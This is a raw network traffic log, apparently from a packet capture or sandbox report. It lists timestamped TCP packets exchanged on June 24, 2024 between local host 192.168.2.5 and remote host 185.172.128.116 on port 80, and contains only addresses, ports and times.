Jun 24, 2024 00:10:12.722897053 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722913027 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.722913027 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.722942114 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.722980976 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.723728895 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.723743916 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.723757982 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.723783970 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.723818064 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.726044893 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.726110935 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.813414097 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.813513994 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816622972 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816695929 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816719055 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816735983 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816780090 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816782951 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816798925 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816802025 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816818953 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816833019 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816852093 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816876888 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816879034 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816895962 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.816956043 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.816994905 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817068100 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817122936 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817130089 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817138910 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817162991 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817178965 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817184925 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817219973 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817248106 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817424059 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817470074 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817486048 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817496061 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817511082 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817533970 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817563057 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817622900 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817639112 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817653894 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817682028 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817687035 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817703962 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.817735910 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.817789078 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818192005 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818217039 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818232059 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818254948 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818291903 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818304062 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818310022 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818326950 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818341970 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818346024 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818346024 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818372965 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818412066 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818435907 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818450928 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818464994 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818480968 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.818490982 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818510056 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.818552017 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819081068 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819107056 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819122076 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819153070 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819183111 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819200993 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819216013 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819230080 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819257021 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819267035 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819283009 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819294930 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819308996 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819324017 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819333076 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819339991 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.819371939 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.819403887 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.821515083 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.821599960 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.909394979 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.909514904 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912564993 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912584066 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912600994 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912647009 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912691116 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912705898 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912709951 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912729025 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912744999 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912748098 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912775040 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912810087 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912899971 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.912949085 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.912986040 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913005114 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913024902 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913042068 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913069963 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913089991 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913098097 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913103104 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913108110 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913122892 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913140059 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913146973 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913463116 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913511992 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913511992 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913511992 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913532972 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913547039 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913562059 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913583994 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913589001 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913599968 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913616896 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913624048 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913639069 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913656950 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913667917 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913674116 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913703918 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913717985 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913732052 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913732052 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913753033 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913767099 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913789988 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913811922 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913815022 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913837910 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913853884 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913867950 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913872004 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.913897038 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913908958 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.913927078 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914093018 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914117098 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914133072 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914144039 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914150000 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914180994 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914180994 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914223909 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914244890 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914261103 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914278030 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914295912 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914299011 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914323092 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914336920 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914361954 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914393902 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914412975 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914434910 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914444923 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914459944 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914485931 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914506912 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914522886 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914537907 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914560080 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914576054 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914746046 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914762020 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914778948 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914793968 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914794922 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914823055 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914835930 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914839029 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914855957 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914870977 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914872885 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914891958 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914902925 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914927006 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914930105 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914944887 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914958954 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914964914 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.914974928 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.914989948 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915004969 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915009022 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.915019989 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915035009 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915049076 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.915050983 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915066004 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.915074110 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915090084 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915096998 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.915107012 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915119886 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.915122032 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915138006 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:12.915159941 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:12.918555021 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.005542994 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.005702972 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.005876064 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.005944967 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.005951881 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.005999088 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006006002 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006033897 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006055117 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006088972 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006109953 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006141901 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006143093 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006165028 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006180048 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006192923 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006196976 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006212950 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006228924 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006234884 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006244898 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006261110 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006273031 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006275892 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006294012 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006298065 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006310940 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006329060 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006337881 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006345034 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.006376028 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.006398916 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.008642912 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008719921 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.008730888 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008749962 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008790016 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.008805037 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.008893013 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008908987 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008927107 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008943081 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.008944035 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.008975029 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009001017 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009001017 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009083033 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009139061 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009174109 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009191036 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009227037 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009247065 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009294987 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009311914 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009327888 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009341002 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009347916 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009357929 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009372950 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009373903 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009413958 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009633064 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009691000 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009732962 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009748936 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009763002 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009778976 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009780884 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009802103 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009816885 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.009819984 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009851933 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.009872913 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010030985 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010046959 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010061979 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010077000 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010092020 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010106087 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010109901 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010128021 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010152102 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010323048 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010327101 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010344982 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010360956 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010375023 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010381937 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010391951 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010407925 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010422945 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010422945 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010440111 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010457993 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010504961 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010520935 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010535955 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010536909 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010552883 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010561943 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010570049 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010586023 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010586023 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010620117 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010656118 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010663033 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010673046 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010688066 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010703087 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010706902 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010720015 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010735035 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010736942 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010765076 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010776043 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010780096 CEST	80	49711	185.172.128.116	192.168.2.5
